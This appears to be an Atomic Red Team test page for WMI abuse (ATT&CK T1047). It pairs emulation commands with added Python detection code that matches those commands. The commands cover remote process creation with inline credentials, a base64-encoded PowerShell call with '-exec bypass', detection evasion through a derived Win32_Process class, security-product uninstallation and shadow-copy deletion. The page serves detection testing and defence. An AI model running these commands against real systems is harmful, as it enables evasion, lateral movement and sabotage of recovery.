# T1047 - Windows Management Instrumentation

Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is designed for programmers and is the infrastructure for management data and operations on Windows systems.(Citation: WMI 1-3) WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by [Remote Services](https://attack.mitre.org/techniques/T1021) such as [Distributed Component Object Model](https://attack.mitre.org/techniques/T1021/003) and [Windows Remote Management](https://attack.mitre.org/techniques/T1021/006).(Citation: WMI 1-3) Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.(Citation: WMI 1-3) (Citation: Mandiant WMI)

An adversary can use WMI to interact with local and remote systems and use it as a means to execute various behaviors, such as gathering information for [Discovery](https://attack.mitre.org/tactics/TA0007) as well as [Execution](https://attack.mitre.org/tactics/TA0002) of commands and payloads.(Citation: Mandiant WMI) For example, `wmic.exe` can be abused by an adversary to delete shadow copies with the command `wmic.exe Shadowcopy Delete` (i.e., [Inhibit System Recovery](https://attack.mitre.org/techniques/T1490)).(Citation: WMI 6)

**Note:** `wmic.exe` is deprecated as of January 2024, with the WMIC feature being "disabled by default" on Windows 11+. WMIC will be removed from subsequent Windows releases and replaced by [PowerShell](https://attack.mitre.org/techniques/T1059/001) as the primary WMI interface.(Citation: WMI 7,8) In addition to PowerShell and tools like `wbemtool.exe`, COM APIs can also be used to programmatically interact with WMI via C++, .NET, VBScript, etc.(Citation: WMI 7,8)
## Atomic Tests

- Atomic Test #7 - Create a Process using WMI Query and an Encoded Command
- Atomic Test #8 - Create a Process using obfuscated Win32_Process
## Atomic Test #1

An adversary might use WMI to list all local user accounts. When the test completes, the local user account information is displayed on the command line.

**Supported Platforms:** Windows

**auto_generated_guid:** c107778c-dcf5-47c5-af2e-1d058a3df3ea

#### Attack Commands: Run with `command_prompt`!

```cmd
wmic useraccount get /ALL /format:csv
```
## Atomic Test #2

An adversary might use WMI to list the processes running on the compromised host. When the test completes, the running processes are listed on the command line.

**Supported Platforms:** Windows

**auto_generated_guid:** 5750aa16-0e59-4410-8b9a-8a47ca2788e2

#### Attack Commands: Run with `command_prompt`!

```cmd
wmic process get caption,executablepath,commandline /format:csv
```
## Atomic Test #3

An adversary might use WMI to list installed software hotfixes and patches. When the test completes, a list of installed patches and their installation dates is displayed.

**Supported Platforms:** Windows

**auto_generated_guid:** 718aebaa-d0e0-471a-8241-c5afa69c7414

#### Attack Commands: Run with `command_prompt`!

```cmd
wmic qfe get description,installedOn /format:csv
```
## Atomic Test #4

An adversary might use WMI to check whether a particular service is running on a remote device. When the test completes, the service information is displayed on screen if the service exists. A common feedback message is "No instance(s) Available" if the queried service is not running. A common error message is "Node - (provided IP or default) ERROR Description = The RPC server is unavailable" if the provided remote host is unreachable.

**Supported Platforms:** Windows

**auto_generated_guid:** 0fd48ef7-d890-4e93-a533-f7dedd5191d3

#### Inputs:

| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| node | IP address | string | 127.0.0.1 |
| service_search_string | Name of service | string | Spooler |

#### Attack Commands: Run with `command_prompt`!

```cmd
wmic /node:"#{node}" service where (caption like "%#{service_search_string}%")
```
## Atomic Test #5

This test uses wmic.exe to execute a process on the local host. When the test completes, a new process is started locally; with the default input, a Notepad window is opened.

**Supported Platforms:** Windows

**auto_generated_guid:** b3bdfc91-b33e-4c6d-a5c8-d64bee0276b3

#### Inputs:

| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| process_to_execute | Name or path of process to execute. | string | notepad.exe |

#### Attack Commands: Run with `command_prompt`!

```cmd
wmic process call create #{process_to_execute}
```

#### Cleanup Commands:

```cmd
wmic process where name='#{process_to_execute}' delete >nul 2>&1
```
## Atomic Test #6

This test uses wmic.exe to execute a process on a remote host. Specify a valid value for the remote IP using the node parameter. To clean up, provide the same node input as the one used to run the test. A common error message is "Node - (provided IP or default) ERROR Description = The RPC server is unavailable" if the default or provided IP is unreachable.

**Supported Platforms:** Windows

**auto_generated_guid:** 9c8ef159-c666-472f-9874-90c8d60d136b

#### Inputs:

| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| node | IP address | string | 127.0.0.1 |
| user_name | Username | string | DOMAIN\Administrator |
| password | Password | string | P@ssw0rd1 |
| process_to_execute | Name or path of process to execute. | string | notepad.exe |

#### Attack Commands: Run with `command_prompt`!

```cmd
wmic /user:#{user_name} /password:#{password} /node:"#{node}" process call create #{process_to_execute}
```

#### Cleanup Commands:

```cmd
wmic /user:#{user_name} /password:#{password} /node:"#{node}" process where name='#{process_to_execute}' delete >nul 2>&1
```
## Atomic Test #7 - Create a Process using WMI Query and an Encoded Command

Solarigate persistence is achieved via backdoors deployed through various techniques, including PowerShell with an EncodedCommand:

`Powershell -nop -exec bypass -EncodedCommand`

**Supported Platforms:** Windows

**auto_generated_guid:** 7db7a7f9-9531-4840-9b30-46220135441c

#### Attack Commands: Run with `command_prompt`!

```cmd
powershell -exec bypass -e SQBuAHYAbwBrAGUALQBXAG0AaQBNAGUAdABoAG8AZAAgAC0AUABhAHQAaAAgAHcAaQBuADMAMgBfAHAAcgBvAGMAZQBzAHMAIAAtAE4AYQBtAGUAIABjAHIAZQBhAHQAZQAgAC0AQQByAGcAdQBtAGUAbgB0AEwAaQBzAHQAIABuAG8AdABlAHAAYQBkAC4AZQB4AGUA
```
## Atomic Test #8 - Create a Process using obfuscated Win32_Process

This test tries to mask process creation by creating a new class that inherits from Win32_Process. Indirectly calling a suspicious method such as Win32_Process::Create can break detection logic. See the Cybereason blog post "No Win32_Process Needed".

**Supported Platforms:** Windows

**auto_generated_guid:** 10447c83-fc38-462a-a936-5102363b1c43

#### Inputs:

| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| new_class | Derived class name | string | Win32_Atomic |
| process_to_execute | Name or path of process to execute. | string | notepad.exe |

#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)

```powershell
$Class = New-Object Management.ManagementClass(New-Object Management.ManagementPath("Win32_Process"))
$NewClass = $Class.Derive("#{new_class}")
$NewClass.Put()
Invoke-WmiMethod -Path #{new_class} -Name create -ArgumentList #{process_to_execute}
```

#### Cleanup Commands:

```powershell
$CleanupClass = New-Object Management.ManagementClass(New-Object Management.ManagementPath("#{new_class}"))
try { $CleanupClass.Delete() } catch {}
```
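Test #8 works because a detection keyed on the literal class name `Win32_Process` never sees `Win32_Atomic`. The defensive counterpart is to resolve a class's derivation chain and match on the lineage rather than the leaf name, and to baseline which classes in `root\cimv2` are expected to derive from `Win32_Process` at all. The example below is added here and is not Atomic Red Team code: the class inventory is a constructed, abbreviated stand-in for what `Get-CimClass` (or the `__SUPERCLASS` system property) reports, with `Win32_Atomic` inserted as the class the test derives; the baseline set and function names are assumptions of the example.

```python
"""Match WMI method calls on class lineage, not on the literal class name.

Added example, not Atomic Red Team code. CLASS_INVENTORY is a constructed,
abbreviated stand-in for a root\\cimv2 class listing: each entry maps a class
to its superclass (None for a root class), as Get-CimClass or the __SUPERCLASS
system property would report it. Win32_Atomic is the class Test #8 derives.
"""

CLASS_INVENTORY = {
    "CIM_ManagedSystemElement": None,
    "CIM_LogicalElement": "CIM_ManagedSystemElement",
    "CIM_Process": "CIM_LogicalElement",
    "Win32_Process": "CIM_Process",
    "CIM_Service": "CIM_LogicalElement",
    "Win32_Service": "CIM_Service",
    "Win32_Atomic": "Win32_Process",  # planted by $Class.Derive("Win32_Atomic") in Test #8
}

# Constructed baseline: the classes an unmodified host is expected to carry.
# Anything else whose lineage reaches Win32_Process is a candidate for the Test #8 trick.
BASELINE_CLASSES = frozenset({
    "CIM_ManagedSystemElement", "CIM_LogicalElement", "CIM_Process",
    "Win32_Process", "CIM_Service", "Win32_Service",
})


def derivation_chain(class_name, inventory=CLASS_INVENTORY):
    """Superclasses of class_name from nearest to root (the order __DERIVATION uses)."""
    chain, seen = [], set()
    parent = inventory.get(class_name)
    while parent is not None and parent not in seen:  # `seen` guards against a malformed cycle
        seen.add(parent)
        chain.append(parent)
        parent = inventory.get(parent)
    return chain


def _derives_from_process(class_name, inventory):
    # WMI class names are case-insensitive, so compare lowercased.
    return any(cls.lower() == "win32_process" for cls in derivation_chain(class_name, inventory))


def is_process_create(class_name, method_name, inventory=CLASS_INVENTORY):
    """True when method_name is Create on Win32_Process or on any class derived from it."""
    if method_name.lower() != "create":
        return False
    return class_name.lower() == "win32_process" or _derives_from_process(class_name, inventory)


def find_unexpected_process_classes(inventory=CLASS_INVENTORY, baseline=BASELINE_CLASSES):
    """Classes outside the baseline that inherit from Win32_Process (hunting view)."""
    return sorted(
        name for name in inventory
        if name not in baseline and _derives_from_process(name, inventory)
    )


if __name__ == "__main__":
    # Constructed method-call records of the form (class, method) as a WMI
    # activity trace might surface them.
    calls = [("Win32_Process", "Create"), ("Win32_Atomic", "create"), ("Win32_Service", "StartService")]
    for cls, method in calls:
        print(f"{cls}.{method}: process creation = {is_process_create(cls, method)}")
    print("unexpected Win32_Process descendants:", find_unexpected_process_classes())
```

The hunting function is the piece worth scheduling: a nightly comparison of `root\cimv2` against a known-good class list catches a planted derived class even when the `Create` call itself was never logged.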
## Atomic Test #9

This test uses wmic.exe to execute a DLL function using rundll32. Specify a valid value for the remote IP using the node parameter.

**Supported Platforms:** Windows

**auto_generated_guid:** 00738d2a-4651-4d76-adf2-c43a41dfb243

#### Inputs:

| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| node | IP address | string | 127.0.0.1 |
| dll_to_execute | Path to DLL. | string | PathToAtomicsFolder\..\ExternalPayloads\calc.dll |
| function_to_execute | Name of DLL function to call | string | StartW |

#### Attack Commands: Run with `command_prompt`!

```cmd
wmic /node:#{node} process call create "rundll32.exe \"#{dll_to_execute}\" #{function_to_execute}"
```

#### Cleanup Commands:

```cmd
taskkill /f /im calculator.exe
```

#### Dependencies: Run with `powershell`!

##### Check Prereq Commands:

```powershell
if (Test-Path "#{dll_to_execute}") {exit 0} else {exit 1}
```

##### Get Prereq Commands:

```powershell
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1047/bin/calc.dll?raw=true" -OutFile "#{dll_to_execute}"
```
## Atomic Test #10

Emulates uninstalling applications using WMIC. This method only works if the product was installed from an MSI file. APTs have been seen using this to uninstall security products.

**Supported Platforms:** Windows

**auto_generated_guid:** c510d25b-1667-467d-8331-a56d3e9bc4ff

#### Inputs:

| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| node | Computer the action is executed against; defaults to localhost. | string | 127.0.0.1 |
| product | Name of the product being uninstalled. Defaults to TightVNC. | string | Tightvnc |

#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)

```cmd
wmic /node:"#{node}" product where "name like '#{product}%%'" call uninstall
```

#### Cleanup Commands:

```cmd
msiexec /i "PathToAtomicsFolder\..\ExternalPayloads\tightvncinstaller.msi" /qn /norestart
```

#### Dependencies: Run with `powershell`!

##### Check Prereq Commands:

```powershell
if ((Test-Path "C:\Program Files\TightVNC\tvnviewer.exe") -Or (Test-Path "C:\Program Files (x86)\TightVNC\tvnviewer.exe")) {exit 0} else {exit 1}
```

##### Get Prereq Commands:

```powershell
Invoke-WebRequest 'https://www.tightvnc.com/download/2.8.63/tightvnc-2.8.63-gpl-setup-64bit.msi' -OutFile "PathToAtomicsFolder\..\ExternalPayloads\tightvncinstaller.msi"
start-sleep -s 10
msiexec /i "PathToAtomicsFolder\..\ExternalPayloads\tightvncinstaller.msi" /qn /norestart
start-sleep -s 15
```
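A detection-side companion to the wmic and PowerShell command lines exercised in Atomic Tests #1 through #7, #9 and #10, added here as an example and not part of the Atomic Red Team project. It scores constructed process-creation records (the command-line and parent-process fields of a Sysmon Event ID 1 or Security 4688 event) against the patterns those tests produce, decodes a PowerShell `-EncodedCommand` argument so that the WMI method call hidden in Test #7 is visible to the same rules, and flags children of `WmiPrvSE.exe`, the provider host that spawns anything created through `Win32_Process.Create`. The sample events and rule names are assumptions of the example; the encoded string in the sample is the one from Test #7 and decodes to `Invoke-WmiMethod -Path win32_process -Name create -ArgumentList notepad.exe`.

```python
"""Score process-creation command lines for the WMI abuse patterns exercised above.

Added example, not Atomic Red Team code. SAMPLE_EVENTS is constructed and only
mimics the command-line and parent-process fields of a Sysmon Event ID 1 or
Security 4688 record; the rule names and the WmiPrvSE heuristic are my own.
"""
import base64
import re

# The -e argument from Atomic Test #7 (base64 of a UTF-16LE Invoke-WmiMethod call).
TEST7_ENCODED = (
    "SQBuAHYAbwBrAGUALQBXAG0AaQBNAGUAdABoAG8AZAAgAC0AUABhAHQAaAAgAHcAaQBuADMAMgBfAHAA"
    "cgBvAGMAZQBzAHMAIAAtAE4AYQBtAGUAIABjAHIAZQBhAHQAZQAgAC0AQQByAGcAdQBtAGUAbgB0AEwA"
    "aQBzAHQAIABuAG8AdABlAHAAYQBkAC4AZQB4AGUA"
)

# Constructed sample events; the command lines mirror the atomic tests on this page.
SAMPLE_EVENTS = [
    {"parent": "cmd.exe", "cmdline": "wmic useraccount get /ALL /format:csv"},
    {"parent": "cmd.exe", "cmdline": "wmic process get caption,executablepath,commandline /format:csv"},
    {"parent": "cmd.exe", "cmdline": "wmic qfe get description,installedOn /format:csv"},
    {"parent": "cmd.exe", "cmdline": 'wmic /node:"10.0.0.5" service where (caption like "%Spooler%")'},
    {"parent": "cmd.exe", "cmdline": "wmic process call create notepad.exe"},
    {"parent": "cmd.exe", "cmdline": 'wmic /user:DOMAIN\\Administrator /password:P@ssw0rd1 /node:"10.0.0.5" process call create notepad.exe'},
    {"parent": "cmd.exe", "cmdline": "powershell -exec bypass -e " + TEST7_ENCODED},
    {"parent": "cmd.exe", "cmdline": r'wmic /node:10.0.0.5 process call create "rundll32.exe \"PathToAtomicsFolder\..\ExternalPayloads\calc.dll\" StartW"'},
    {"parent": "cmd.exe", "cmdline": 'wmic /node:"127.0.0.1" product where "name like \'Tightvnc%%\'" call uninstall'},
    {"parent": "cmd.exe", "cmdline": "wmic.exe Shadowcopy Delete"},
    {"parent": "cmd.exe", "cmdline": "wmic os get caption"},  # ordinary inventory query: no rule fires
    {"parent": r"C:\Windows\System32\wbem\WmiPrvSE.exe", "cmdline": "notepad.exe"},
]

# Rules run against the raw command line and, when present, the decoded -EncodedCommand payload.
RULES = [
    ("wmic_recon_query", re.compile(r"\bwmic(?:\.exe)?\b.*\b(?:useraccount|process|qfe|service)\s+(?:get|where)\b", re.I)),
    ("wmic_remote_node", re.compile(r"\bwmic(?:\.exe)?\b.*\s/node:", re.I)),
    ("wmic_inline_credentials", re.compile(r"\bwmic(?:\.exe)?\b.*\s/password:", re.I)),
    ("wmic_process_create", re.compile(r"\bprocess\s+call\s+create\b", re.I)),
    ("wmic_create_rundll32", re.compile(r"\bprocess\s+call\s+create\b.*\brundll32", re.I)),
    ("wmic_product_uninstall", re.compile(r"\bproduct\b.*\bcall\s+uninstall\b", re.I)),
    ("wmic_shadowcopy_delete", re.compile(r"\bshadowcopy\s+delete\b", re.I)),
    ("powershell_wmi_process_create", re.compile(r"\bInvoke-(?:Wmi|Cim)Method\b.*\bwin32_process\b.*\bcreate\b", re.I)),
]

# "-e<letters> <base64>"; the flag is validated below because PowerShell accepts
# any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...) but not -exec.
ENCODED_FLAG = re.compile(r"(?:^|\s)-(e[a-z]*)\s+([A-Za-z0-9+/=]{8,})", re.I)


def decode_encoded_command(cmdline):
    """Return the UTF-16LE text behind an -EncodedCommand argument, or None."""
    for match in ENCODED_FLAG.finditer(cmdline):
        flag, blob = match.group(1).lower(), match.group(2)
        if not "encodedcommand".startswith(flag):
            continue
        try:
            return base64.b64decode(blob, validate=True).decode("utf-16-le")
        except (ValueError, UnicodeDecodeError):
            return None
    return None


def analyze(event):
    """Return the sorted rule names that fire for one process-creation record."""
    hits = set()
    texts = [event["cmdline"]]
    decoded = decode_encoded_command(event["cmdline"])
    if decoded is not None:
        hits.add("powershell_encoded_command")
        texts.append(decoded)  # let every rule see the decoded payload too
    for name, pattern in RULES:
        if any(pattern.search(text) for text in texts):
            hits.add(name)
    if event.get("parent", "").lower().endswith("wmiprvse.exe"):
        hits.add("spawned_by_wmiprvse")
    return sorted(hits)


def analyze_all(events):
    """Pair each command line with its hits, for a quick triage table."""
    return [(event["cmdline"], analyze(event)) for event in events]


if __name__ == "__main__":
    for cmdline, hits in analyze_all(SAMPLE_EVENTS):
        print(f"{', '.join(hits) or '-':<70} {cmdline[:60]}")
```

The parent-process check is the one that survives the WMIC deprecation noted in the description: whether the caller is `wmic.exe`, PowerShell, or a COM client, a process created through `Win32_Process.Create` still appears as a child of `WmiPrvSE.exe`, so that relationship is worth keeping as a standing hunt even after the command-line patterns stop matching.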